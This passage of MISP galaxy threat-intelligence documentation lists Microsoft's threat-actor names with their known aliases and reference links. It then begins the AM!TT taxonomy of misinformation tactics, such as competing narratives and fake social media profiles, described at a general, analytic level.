  • uses: misp-galaxy:tool="HALFRIG" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="QUARTERRIG" with estimative-language:likelihood-probability="likely"

Table 5091. Table References

Links

https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

Aqua Blizzard

The tag is: misp-galaxy:microsoft-activity-group="Aqua Blizzard"

Aqua Blizzard is also known as:

  • ACTINIUM

  • UNC530

  • Primitive Bear

  • Gamaredon

Aqua Blizzard has relationships with:

  • similar: misp-galaxy:threat-actor="Gamaredon Group" with estimative-language:likelihood-probability="likely"

Table 5092. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Brass Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Brass Typhoon"

Brass Typhoon is also known as:

  • BARIUM

  • APT41

Brass Typhoon has relationships with:

  • similar: misp-galaxy:threat-actor="APT41" with estimative-language:likelihood-probability="likely"

Table 5093. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Cadet Blizzard

The tag is: misp-galaxy:microsoft-activity-group="Cadet Blizzard"

Cadet Blizzard is also known as:

  • DEV-0586

Cadet Blizzard has relationships with:

  • similar: misp-galaxy:threat-actor="DEV-0586" with estimative-language:likelihood-probability="likely"

Table 5094. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Camouflage Tempest

The tag is: misp-galaxy:microsoft-activity-group="Camouflage Tempest"

Camouflage Tempest is also known as:

  • TAAL

  • FIN6

  • Skeleton Spider

Camouflage Tempest has relationships with:

  • similar: misp-galaxy:threat-actor="FIN6" with estimative-language:likelihood-probability="likely"

Table 5095. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Canvas Cyclone

The tag is: misp-galaxy:microsoft-activity-group="Canvas Cyclone"

Canvas Cyclone is also known as:

  • BISMUTH

  • APT32

  • OceanLotus

Canvas Cyclone has relationships with:

  • similar: misp-galaxy:threat-actor="APT32" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="海莲花 - APT-C-00" with estimative-language:likelihood-probability="likely"

Table 5096. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Caramel Tsunami

The tag is: misp-galaxy:microsoft-activity-group="Caramel Tsunami"

Caramel Tsunami is also known as:

  • SOURGUM

  • Candiru

Table 5097. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Carmine Tsunami

The tag is: misp-galaxy:microsoft-activity-group="Carmine Tsunami"

Carmine Tsunami is also known as:

  • DEV-0196

  • QuaDream

Table 5098. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Charcoal Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Charcoal Typhoon"

Charcoal Typhoon is also known as:

  • CHROMIUM

  • ControlX

Charcoal Typhoon has relationships with:

  • similar: misp-galaxy:threat-actor="Earth Lusca" with estimative-language:likelihood-probability="likely"

Table 5099. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Cinnamon Tempest

The tag is: misp-galaxy:microsoft-activity-group="Cinnamon Tempest"

Cinnamon Tempest is also known as:

  • DEV-0401

  • Emperor Dragonfly

  • Bronze Starlight

Cinnamon Tempest has relationships with:

  • similar: misp-galaxy:threat-actor="BRONZE STARLIGHT" with estimative-language:likelihood-probability="likely"

Table 5100. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Circle Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Circle Typhoon"

Circle Typhoon is also known as:

  • DEV-0322

Table 5101. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Cotton Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Cotton Sandstorm"

Cotton Sandstorm is also known as:

  • NEPTUNIUM

  • Vice Leaker

  • DEV-0198

Table 5102. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Crimson Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Crimson Sandstorm"

Crimson Sandstorm is also known as:

  • CURIUM

  • TA456

  • Tortoise Shell

Table 5103. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Cuboid Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Cuboid Sandstorm"

Cuboid Sandstorm is also known as:

  • DEV-0228

Table 5104. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Denim Tsunami

The tag is: misp-galaxy:microsoft-activity-group="Denim Tsunami"

Denim Tsunami is also known as:

  • KNOTWEED

  • DSIRF

Table 5105. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Diamond Sleet

The tag is: misp-galaxy:microsoft-activity-group="Diamond Sleet"

Diamond Sleet is also known as:

  • ZINC

  • Labyrinth Chollima

  • Lazarus

Diamond Sleet has relationships with:

  • similar: misp-galaxy:threat-actor="Lazarus Group" with estimative-language:likelihood-probability="likely"

Table 5106. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Emerald Sleet

The tag is: misp-galaxy:microsoft-activity-group="Emerald Sleet"

Emerald Sleet is also known as:

  • THALLIUM

  • Kimsuky

  • Velvet Chollima

Emerald Sleet has relationships with:

  • similar: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

Table 5107. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Forest Blizzard

The tag is: misp-galaxy:microsoft-activity-group="Forest Blizzard"

Forest Blizzard is also known as:

  • STRONTIUM

  • APT28

  • Fancy Bear

Forest Blizzard has relationships with:

  • similar: misp-galaxy:threat-actor="APT28" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="奇幻熊 - APT-C-20" with estimative-language:likelihood-probability="likely"

Table 5108. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Ghost Blizzard

The tag is: misp-galaxy:microsoft-activity-group="Ghost Blizzard"

Ghost Blizzard is also known as:

  • BROMINE

  • Energetic Bear

  • Crouching Yeti

Ghost Blizzard has relationships with:

  • similar: misp-galaxy:threat-actor="ENERGETIC BEAR" with estimative-language:likelihood-probability="likely"

Table 5109. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Gingham Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Gingham Typhoon"

Gingham Typhoon is also known as:

  • GADOLINIUM

  • APT40

  • Leviathan

  • TEMP.Periscope

  • Kryptonite Panda

Gingham Typhoon has relationships with:

  • similar: misp-galaxy:threat-actor="APT40" with estimative-language:likelihood-probability="likely"

Table 5110. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Granite Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Granite Typhoon"

Granite Typhoon is also known as:

  • GALLIUM

Granite Typhoon has relationships with:

  • similar: misp-galaxy:threat-actor="GALLIUM" with estimative-language:likelihood-probability="likely"

Table 5111. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Gray Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Gray Sandstorm"

Gray Sandstorm is also known as:

  • DEV-0343

Table 5112. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Hazel Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Hazel Sandstorm"

Hazel Sandstorm is also known as:

  • EUROPIUM

  • Cobalt Gypsy

  • APT34

  • OilRig

Hazel Sandstorm has relationships with:

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

Table 5113. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Lace Tempest

The tag is: misp-galaxy:microsoft-activity-group="Lace Tempest"

Lace Tempest is also known as:

  • DEV-0950

  • FIN11

  • TA505

Lace Tempest has relationships with:

  • similar: misp-galaxy:threat-actor="TA505" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="FIN11" with estimative-language:likelihood-probability="likely"

Table 5114. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Lemon Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Lemon Sandstorm"

Lemon Sandstorm is also known as:

  • RUBIDIUM

  • Fox Kitten

  • UNC757

  • PioneerKitten

Lemon Sandstorm has relationships with:

  • similar: misp-galaxy:threat-actor="Fox Kitten" with estimative-language:likelihood-probability="likely"

Table 5115. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Lilac Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Lilac Typhoon"

Lilac Typhoon is also known as:

  • DEV-0234

Table 5116. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Manatee Tempest

The tag is: misp-galaxy:microsoft-activity-group="Manatee Tempest"

Manatee Tempest is also known as:

  • DEV-0243

  • EvilCorp

  • UNC2165

  • Indrik Spider

Manatee Tempest has relationships with:

  • similar: misp-galaxy:threat-actor="INDRIK SPIDER" with estimative-language:likelihood-probability="likely"

Table 5117. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Mango Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Mango Sandstorm"

Mango Sandstorm is also known as:

  • MERCURY

  • MuddyWater

  • SeedWorm

  • Static Kitten

  • TEMP.Zagros

Mango Sandstorm has relationships with:

  • similar: misp-galaxy:threat-actor="MuddyWater" with estimative-language:likelihood-probability="likely"

Table 5118. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Marbled Dust

The tag is: misp-galaxy:microsoft-activity-group="Marbled Dust"

Marbled Dust is also known as:

  • SILICON

  • Sea Turtle

Marbled Dust has relationships with:

  • similar: misp-galaxy:threat-actor="Sea Turtle" with estimative-language:likelihood-probability="likely"

Table 5119. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Marigold Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Marigold Sandstorm"

Marigold Sandstorm is also known as:

  • DEV-0500

  • Moses Staff

Marigold Sandstorm has relationships with:

  • similar: misp-galaxy:threat-actor="MosesStaff" with estimative-language:likelihood-probability="likely"

Table 5120. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Midnight Blizzard

The tag is: misp-galaxy:microsoft-activity-group="Midnight Blizzard"

Midnight Blizzard is also known as:

  • NOBELIUM

  • APT29

  • Cozy Bear

Midnight Blizzard has relationships with:

  • similar: misp-galaxy:threat-actor="APT29" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="UNC2452" with estimative-language:likelihood-probability="likely"

Table 5121. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Mint Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Mint Sandstorm"

Mint Sandstorm is also known as:

  • PHOSPHORUS

  • APT35

  • Charming Kitten

Mint Sandstorm has relationships with:

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="APT35" with estimative-language:likelihood-probability="likely"

Table 5122. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Mulberry Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Mulberry Typhoon"

Mulberry Typhoon is also known as:

  • MANGANESE

  • APT5

  • Keyhole Panda

  • TABCTENG

Mulberry Typhoon has relationships with:

  • similar: misp-galaxy:threat-actor="APT5" with estimative-language:likelihood-probability="likely"

Table 5123. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Mustard Tempest

The tag is: misp-galaxy:microsoft-activity-group="Mustard Tempest"

Mustard Tempest is also known as:

  • DEV-0206

  • Purple Vallhund

Table 5124. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Night Tsunami

The tag is: misp-galaxy:microsoft-activity-group="Night Tsunami"

Night Tsunami is also known as:

  • DEV-0336

  • NSO Group

Table 5125. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Nylon Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Nylon Typhoon"

Nylon Typhoon is also known as:

  • NICKEL

  • ke3chang

  • APT15

  • Vixen Panda

Nylon Typhoon has relationships with:

  • similar: misp-galaxy:threat-actor="APT15" with estimative-language:likelihood-probability="likely"

Table 5126. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Opal Sleet

The tag is: misp-galaxy:microsoft-activity-group="Opal Sleet"

Opal Sleet is also known as:

  • OSMIUM

  • Konni

Table 5127. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Peach Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Peach Sandstorm"

Peach Sandstorm is also known as:

  • HOLMIUM

  • APT33

  • Refined Kitten

Peach Sandstorm has relationships with:

  • similar: misp-galaxy:threat-actor="APT33" with estimative-language:likelihood-probability="likely"

Table 5128. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Pearl Sleet

The tag is: misp-galaxy:microsoft-activity-group="Pearl Sleet"

Pearl Sleet is also known as:

  • LAWRENCIUM

  • DEV-0215

Table 5129. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Periwinkle Tempest

The tag is: misp-galaxy:microsoft-activity-group="Periwinkle Tempest"

Periwinkle Tempest is also known as:

  • DEV-0193

  • Wizard Spider

  • UNC2053

Periwinkle Tempest has relationships with:

  • similar: misp-galaxy:threat-actor="WIZARD SPIDER" with estimative-language:likelihood-probability="likely"

Table 5130. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Phlox Tempest

The tag is: misp-galaxy:microsoft-activity-group="Phlox Tempest"

Phlox Tempest is also known as:

  • DEV-0796

  • ClickPirate

  • Chrome Loader

  • Choziosi loader

Table 5131. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Pink Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Pink Sandstorm"

Pink Sandstorm is also known as:

  • AMERICIUM

  • Agrius

  • Deadwood

  • BlackShadow

  • SharpBoys

  • DEV-0227

Table 5132. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Pistachio Tempest

The tag is: misp-galaxy:microsoft-activity-group="Pistachio Tempest"

Pistachio Tempest is also known as:

  • DEV-0237

  • FIN12

Pistachio Tempest has relationships with:

  • similar: misp-galaxy:threat-actor="WIZARD SPIDER" with estimative-language:likelihood-probability="likely"

Table 5133. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Plaid Rain

The tag is: misp-galaxy:microsoft-activity-group="Plaid Rain"

Plaid Rain is also known as:

  • POLONIUM

Plaid Rain has relationships with:

  • similar: misp-galaxy:threat-actor="POLONIUM" with estimative-language:likelihood-probability="likely"

Table 5134. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Pumpkin Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Pumpkin Sandstorm"

Pumpkin Sandstorm is also known as:

  • DEV-0146

  • ZeroCleare

Table 5135. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Raspberry Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Raspberry Typhoon"

Raspberry Typhoon is also known as:

  • RADIUM

  • APT30

  • LotusBlossom

Raspberry Typhoon has relationships with:

  • similar: misp-galaxy:threat-actor="APT30" with estimative-language:likelihood-probability="likely"

Table 5136. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Ruby Sleet

The tag is: misp-galaxy:microsoft-activity-group="Ruby Sleet"

Ruby Sleet is also known as:

  • CERIUM

Table 5137. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Sangria Tempest

The tag is: misp-galaxy:microsoft-activity-group="Sangria Tempest"

Sangria Tempest is also known as:

  • ELBRUS

  • Carbon Spider

  • FIN7

Sangria Tempest has relationships with:

  • similar: misp-galaxy:threat-actor="FIN7" with estimative-language:likelihood-probability="likely"

Table 5138. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Sapphire Sleet

The tag is: misp-galaxy:microsoft-activity-group="Sapphire Sleet"

Sapphire Sleet is also known as:

  • COPERNICIUM

  • Genie Spider

  • BlueNoroff

Sapphire Sleet has relationships with:

  • similar: misp-galaxy:threat-actor="Lazarus Group" with estimative-language:likelihood-probability="likely"

Table 5139. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Seashell Blizzard

The tag is: misp-galaxy:microsoft-activity-group="Seashell Blizzard"

Seashell Blizzard is also known as:

  • IRIDIUM

  • Sandworm

Seashell Blizzard has relationships with:

  • similar: misp-galaxy:threat-actor="Sandworm" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="IRIDIUM" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="沙虫 - APT-C-13" with estimative-language:likelihood-probability="likely"

Table 5140. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Secret Blizzard

The tag is: misp-galaxy:microsoft-activity-group="Secret Blizzard"

Secret Blizzard is also known as:

  • KRYPTON

  • Venomous Bear

  • Turla

  • Snake

Secret Blizzard has relationships with:

  • similar: misp-galaxy:threat-actor="Turla" with estimative-language:likelihood-probability="likely"

Table 5141. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Silk Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Silk Typhoon"

Silk Typhoon is also known as:

  • HAFNIUM

Silk Typhoon has relationships with:

  • similar: misp-galaxy:threat-actor="HAFNIUM" with estimative-language:likelihood-probability="likely"

Table 5142. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Smoke Sandstorm

The tag is: misp-galaxy:microsoft-activity-group="Smoke Sandstorm"

Smoke Sandstorm is also known as:

  • BOHRIUM

Table 5143. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Spandex Tempest

The tag is: misp-galaxy:microsoft-activity-group="Spandex Tempest"

Spandex Tempest is also known as:

  • CHIMBORAZO

  • TA505

Spandex Tempest has relationships with:

  • similar: misp-galaxy:threat-actor="TA505" with estimative-language:likelihood-probability="likely"

Table 5144. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Star Blizzard

The tag is: misp-galaxy:microsoft-activity-group="Star Blizzard"

Star Blizzard is also known as:

  • SEABORGIUM

  • Callisto

  • Reuse Team

Star Blizzard has relationships with:

  • similar: misp-galaxy:threat-actor="Callisto" with estimative-language:likelihood-probability="likely"

Table 5145. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Storm-0257

The tag is: misp-galaxy:microsoft-activity-group="Storm-0257"

Storm-0257 is also known as:

  • DEV-0257

  • UNC1151

Storm-0257 has relationships with:

  • similar: misp-galaxy:threat-actor="Ghostwriter" with estimative-language:likelihood-probability="likely"

Table 5146. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Storm-0530

The tag is: misp-galaxy:microsoft-activity-group="Storm-0530"

Storm-0530 is also known as:

  • DEV-0530

  • H0lyGh0st

Table 5147. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Strawberry Tempest

The tag is: misp-galaxy:microsoft-activity-group="Strawberry Tempest"

Strawberry Tempest is also known as:

  • DEV-0537

  • LAPSUS$

Strawberry Tempest has relationships with:

  • similar: misp-galaxy:threat-actor="LAPSUS" with estimative-language:likelihood-probability="likely"

Table 5148. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Sunglow Blizzard

The tag is: misp-galaxy:microsoft-activity-group="Sunglow Blizzard"

Sunglow Blizzard is also known as:

  • DEV-0665

Table 5149. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Tomato Tempest

The tag is: misp-galaxy:microsoft-activity-group="Tomato Tempest"

Tomato Tempest is also known as:

  • SPURR

  • Vatet

Table 5150. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Vanilla Tempest

The tag is: misp-galaxy:microsoft-activity-group="Vanilla Tempest"

Vanilla Tempest is also known as:

  • DEV-0832

Table 5151. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Velvet Tempest

The tag is: misp-galaxy:microsoft-activity-group="Velvet Tempest"

Velvet Tempest is also known as:

  • DEV-0504

Table 5152. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Violet Typhoon

The tag is: misp-galaxy:microsoft-activity-group="Violet Typhoon"

Violet Typhoon is also known as:

  • ZIRCONIUM

  • APT31

Violet Typhoon has relationships with:

  • similar: misp-galaxy:threat-actor="APT31" with estimative-language:likelihood-probability="likely"

Table 5153. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Wine Tempest

The tag is: misp-galaxy:microsoft-activity-group="Wine Tempest"

Wine Tempest is also known as:

  • PARINACOTA

  • Wadhrama

Wine Tempest has relationships with:

  • similar: misp-galaxy:threat-actor="PARINACOTA" with estimative-language:likelihood-probability="likely"

Table 5154. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Wisteria Tsunami

The tag is: misp-galaxy:microsoft-activity-group="Wisteria Tsunami"

Wisteria Tsunami is also known as:

  • DEV-0605

  • CyberRoot

Table 5155. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Zigzag Hail

The tag is: misp-galaxy:microsoft-activity-group="Zigzag Hail"

Zigzag Hail is also known as:

  • DUBNIUM

  • Dark Hotel

  • Tapaoux

Zigzag Hail has relationships with:

  • similar: misp-galaxy:360net-threat-actor="Darkhotel - APT-C-06" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="DarkHotel" with estimative-language:likelihood-probability="likely"

Table 5156. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide

Misinformation Pattern

AM!TT Technique.

Misinformation Pattern is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

misinfosecproject

5Ds (dismiss, distort, distract, dismay, divide)

Nimmo’s "4Ds of propaganda": dismiss, distort, distract, dismay (MisinfosecWG added divide in 2019). Misinformation promotes an agenda by advancing narratives supportive of that agenda. This is most effective when the advanced narrative pre-dates the revelation of the specific misinformation content. But this is often not possible.

The tag is: misp-galaxy:amitt-misinformation-pattern="5Ds (dismiss, distort, distract, dismay, divide)"

Table 5157. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0001.md

Facilitate State Propaganda

Organize citizens around pro-state messaging. Paid or volunteer groups coordinated to push state propaganda (examples include 2016 Diba Facebook Expedition, coordinated to overcome China’s Great Firewall to flood the Facebook pages of Taiwanese politicians and news agencies with a pro-PRC message).

The tag is: misp-galaxy:amitt-misinformation-pattern="Facilitate State Propaganda"

Table 5158. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0002.md

Leverage Existing Narratives

Use or adapt existing narrative themes, where narratives are the baseline stories of a target audience. Narratives form the bedrock of our worldviews. New information is understood through a process firmly grounded in this bedrock. If new information is not consistent with the prevailing narratives of an audience, it will be ignored. Effective campaigns will frame their misinformation in the context of these narratives. Highly effective campaigns will make extensive use of audience-appropriate archetypes and meta-narratives throughout their content creation and amplification practices. Examples include "midwesterners are generous" and "Russia is under attack from outside".

The tag is: misp-galaxy:amitt-misinformation-pattern="Leverage Existing Narratives"

Table 5159. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0003.md

Competing Narratives

Advance competing narratives connected to the same issue, i.e. on one hand deny the incident while at the same time expressing dismissal. MH17 (example): "Russian Foreign Ministry again claimed that 'absolutely groundless accusations are put forward against the Russian side, which are aimed at discrediting Russia in the eyes of the international community'" (deny); "The Dutch MH17 investigation is biased, anti-Russian and factually inaccurate" (dismiss).

Suppressing or discouraging narratives already spreading requires an alternative. The most simple set of narrative techniques in response would be the construction and promotion of contradictory alternatives centered on denial, deflection, dismissal, counter-charges, excessive standards of proof, bias in prohibition or enforcement, and so on.

These competing narratives allow loyalists cover, but are less compelling to opponents and fence-sitters than campaigns built around existing narratives or highly explanatory master narratives. Competing narratives, as such, are especially useful in the "firehose of misinformation" approach.

The tag is: misp-galaxy:amitt-misinformation-pattern="Competing Narratives"

Table 5160. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0004.md

Center of Gravity Analysis

Recon/research to identify "the source of power that provides moral or physical strength, freedom of action, or will to act." Thus, the center of gravity is usually seen as the "source of strength". Includes demographic and network analysis of communities.

The tag is: misp-galaxy:amitt-misinformation-pattern="Center of Gravity Analysis"

Table 5161. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0005.md

Create Master Narratives

The promotion of beneficial master narratives is perhaps the most effective method for achieving long-term strategic narrative dominance. From a "whole of society" perspective the promotion of the society’s core master narratives should occupy a central strategic role. From a misinformation campaign / cognitive security perspective the tactics around master narratives center more precisely on the day-to-day promotion and reinforcement of this messaging. In other words, beneficial, high-coverage master narratives are a central strategic goal and their promotion constitutes an ongoing tactical struggle carried out at a whole-of-society level.

By way of example, major powers are promoting master narratives such as:

  • "Huawei is determined to build trustworthy networks"

  • "Russia is the victim of bullying by NATO powers"

  • "USA is guided by its founding principles of liberty and egalitarianism"

Tactically, their promotion covers a broad spectrum of activities both on- and offline.

The tag is: misp-galaxy:amitt-misinformation-pattern="Create Master Narratives"

Table 5162. Table References

Links

https://github.com/misinfosecproject/amitt_framework/blob/master/techniques/T0006.md

Create fake Social Media Profiles / Pages / Groups

Create key social engineering assets needed to amplify content, manipulate algorithms, fool public and/or specific incident/campaign targets.

Computational propaganda depends substantially on false perceptions of credibility and acceptance. By creating fake users and groups with a variety of interests and commitments, attackers can ensure that their messages both come from trusted sources and appear more widely adopted than they actually are.

Examples:

  • Ukraine elections (2019): circumvent Facebook’s new safeguards by paying Ukrainian citizens to give a Russian agent access to their personal pages.

  • EU elections (2019): Avaaz reported more than 500 suspicious pages and groups to Facebook related to the three-month investigation of Facebook disinformation networks in Europe.

  • Mueller report (2016): the IRA was able to reach up to 126 million Americans on Facebook via a mixture of fraudulent accounts, groups, and advertisements, the report says. Twitter accounts it created were portrayed as real American voices by major news outlets. It was even able to hold real-life rallies, mobilizing hundreds of people at a time in major cities like Philadelphia and Miami.

The tag is: misp-galaxy:amitt-misinformation-pattern="Create fake Social Media Profiles / Pages / Groups"

Table 5163. Table References

Links

